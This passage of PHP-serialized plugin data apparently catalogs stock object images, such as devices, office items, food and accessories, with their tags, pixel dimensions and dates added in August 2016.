File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:51;a:12:{s:2:\"id\";s:3:\"124\";s:6:\"handle\";s:18:\"object_antenna.png\";s:4:\"name\";s:13:\"Antenna Radar\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:52;a:12:{s:2:\"id\";s:3:\"123\";s:6:\"handle\";s:21:\"object_solarpanel.png\";s:4:\"name\";s:11:\"Solar Panel\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:53;a:12:{s:2:\"id\";s:3:\"122\";s:6:\"handle\";s:16:\"object_wacom.png\";s:4:\"name\";s:20:\"Wacom Drawing Tablet\";s:4:\"tags\";a:3:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:2;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:54;a:12:{s:2:\"id\";s:3:\"121\";s:6:\"handle\";s:18:\"object_earth_2.png\";s:4:\"name\";s:20:\"Earth Globe Planet 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:55;a:12:{s:2:\"id\";s:3:\"120\";s:6:\"handle\";s:18:\"object_chair_1.png\";s:4:\"name\";s:12:\"Office Chair\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:56;a:12:{s:2:\"id\";s:3:\"119\";s:6:\"handle\";s:24:\"object_windturbine_2.png\";s:4:\"name\";s:14:\"Wind Turbine 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:57;a:12:{s:2:\"id\";s:3:\"118\";s:6:\"handle\";s:22:\"object_windturbine.png\";s:4:\"name\";s:12:\"Wind Turbine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:58;a:12:{s:2:\"id\";s:3:\"117\";s:6:\"handle\";s:16:\"object_earth.png\";s:4:\"name\";s:18:\"Earth Globe Planet\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-15 16:50:55\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:59;a:12:{s:2:\"id\";s:2:\"88\";s:6:\"handle\";s:24:\"object_eiffeltower_2.png\";s:4:\"name\";s:13:\"Eiffeltower 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:60;a:12:{s:2:\"id\";s:2:\"87\";s:6:\"handle\";s:21:\"object_notebook_1.png\";s:4:\"name\";s:11:\"Notebook PC\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:61;a:12:{s:2:\"id\";s:2:\"86\";s:6:\"handle\";s:20:\"object_macbook_1.png\";s:4:\"name\";s:20:\"Apple Macbook Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:62;a:12:{s:2:\"id\";s:2:\"85\";s:6:\"handle\";s:18:\"object_canon_2.png\";s:4:\"name\";s:21:\"Canon Camera DSLR Top\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:63;a:12:{s:2:\"id\";s:2:\"84\";s:6:\"handle\";s:19:\"object_iphone_3.png\";s:4:\"name\";s:25:\"Apple iPhone Silver White\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:64;a:12:{s:2:\"id\";s:2:\"83\";s:6:\"handle\";s:18:\"object_candy_2.png\";s:4:\"name\";s:15:\"Candy Colored 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:65;a:12:{s:2:\"id\";s:2:\"82\";s:6:\"handle\";s:21:\"object_macmouse_1.png\";s:4:\"name\";s:15:\"Apple Mac Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:66;a:12:{s:2:\"id\";s:2:\"81\";s:6:\"handle\";s:19:\"object_iphone_1.png\";s:4:\"name\";s:18:\"Apple iPhone Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:67;a:12:{s:2:\"id\";s:2:\"80\";s:6:\"handle\";s:17:\"object_deco_1.png\";s:4:\"name\";s:17:\"White Deco Object\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:68;a:12:{s:2:\"id\";s:2:\"79\";s:6:\"handle\";s:23:\"object_applewatch_1.png\";s:4:\"name\";s:24:\"Apple Watch White Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:69;a:12:{s:2:\"id\";s:2:\"78\";s:6:\"handle\";s:23:\"object_swissknife_1.png\";s:4:\"name\";s:11:\"Swiss Knife\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:70;a:12:{s:2:\"id\";s:2:\"77\";s:6:\"handle\";s:23:\"object_applewatch_2.png\";s:4:\"name\";s:17:\"Apple Watch Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:71;a:12:{s:2:\"id\";s:2:\"76\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:72;a:12:{s:2:\"id\";s:2:\"75\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:73;a:12:{s:2:\"id\";s:2:\"74\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:74;a:12:{s:2:\"id\";s:2:\"73\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:75;a:12:{s:2:\"id\";s:2:\"72\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:76;a:12:{s:2:\"id\";s:2:\"71\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:77;a:12:{s:2:\"id\";s:2:\"70\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:78;a:12:{s:2:\"id\";s:2:\"69\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:79;a:12:{s:2:\"id\";s:2:\"68\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:80;a:12:{s:2:\"id\";s:2:\"67\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:81;a:12:{s:2:\"id\";s:2:\"66\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:82;a:12:{s:2:\"id\";s:2:\"65\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:83;a:12:{s:2:\"id\";s:2:\"64\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:84;a:12:{s:2:\"id\";s:2:\"63\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:85;a:12:{s:2:\"id\";s:2:\"62\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:86;a:12:{s:2:\"id\";s:2:\"49\";s:6:\"handle\";s:19:\"object_bottle_1.png\";s:4:\"name\";s:18:\"Brown Glass Bottle\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:87;a:12:{s:2:\"id\";s:2:\"48\";s:6:\"handle\";s:20:\"object_glasses_1.png\";s:4:\"name\";s:19:\"Hipster Glasses Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:88;a:12:{s:2:\"id\";s:2:\"47\";s:6:\"handle\";s:21:\"object_magazine_1.png\";s:4:\"name\";s:14:\"Blank Magazine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:89;a:12:{s:2:\"id\";s:2:\"46\";s:6:\"handle\";s:28:\"object_leatherdocument_2.png\";s:4:\"name\";s:24:\"Black Leather Document 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:90;a:12:{s:2:\"id\";s:2:\"45\";s:6:\"handle\";s:18:\"object_purse_2.png\";s:4:\"name\";s:13:\"Black Purse 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:91;a:12:{s:2:\"id\";s:2:\"44\";s:6:\"handle\";s:23:\"object_typewriter_1.png\";s:4:\"name\";s:18:\"Retro Typewriter 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 